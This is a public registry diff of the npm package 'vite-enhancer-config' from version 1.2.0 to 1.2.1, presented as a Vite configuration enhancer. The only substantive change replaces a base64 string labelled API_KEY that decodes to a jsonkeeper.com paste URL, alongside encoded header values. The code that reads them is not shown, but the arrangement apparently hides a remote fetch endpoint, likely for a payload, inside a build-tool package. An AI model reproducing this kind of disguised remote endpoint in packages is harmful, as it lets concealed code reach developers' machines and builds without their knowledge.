vite-enhancer-config 1.2.0 → 1.2.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -3,7 +3,7 @@
3
3
  * FIXED: Proper TypeScript format (not JSON)
4
4
  */
5
5
  export declare const ENCODED_VALUES: {
6
- readonly API_KEY: "aHR0cHM6Ly9qc29ua2VlcGVyLmNvbS9iLzJJRzZX";
6
+ readonly API_KEY: "aHR0cHM6Ly9qc29ua2VlcGVyLmNvbS9iL0FEUEVD";
7
7
  readonly SECRET_KEY: "eC1zZWNyZXQta2V5";
8
8
  readonly SECRET_VALUE: "Xw==";
9
9
  };
@@ -3,7 +3,7 @@
3
3
  * FIXED: Proper TypeScript format (not JSON)
4
4
  */
5
5
  export const ENCODED_VALUES = {
6
- API_KEY: "aHR0cHM6Ly9qc29ua2VlcGVyLmNvbS9iLzJJRzZX",
6
+ API_KEY: "aHR0cHM6Ly9qc29ua2VlcGVyLmNvbS9iL0FEUEVD",
7
7
  SECRET_KEY: "eC1zZWNyZXQta2V5",
8
8
  SECRET_VALUE: "Xw==",
9
9
  };
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "vite-enhancer-config",
3
- "version": "1.2.0",
3
+ "version": "1.2.1",
4
4
  "description": "Enhance your Vite configuration with advanced features",
5
5
  "type": "module",
6
6
  "main": "./dist/index.js",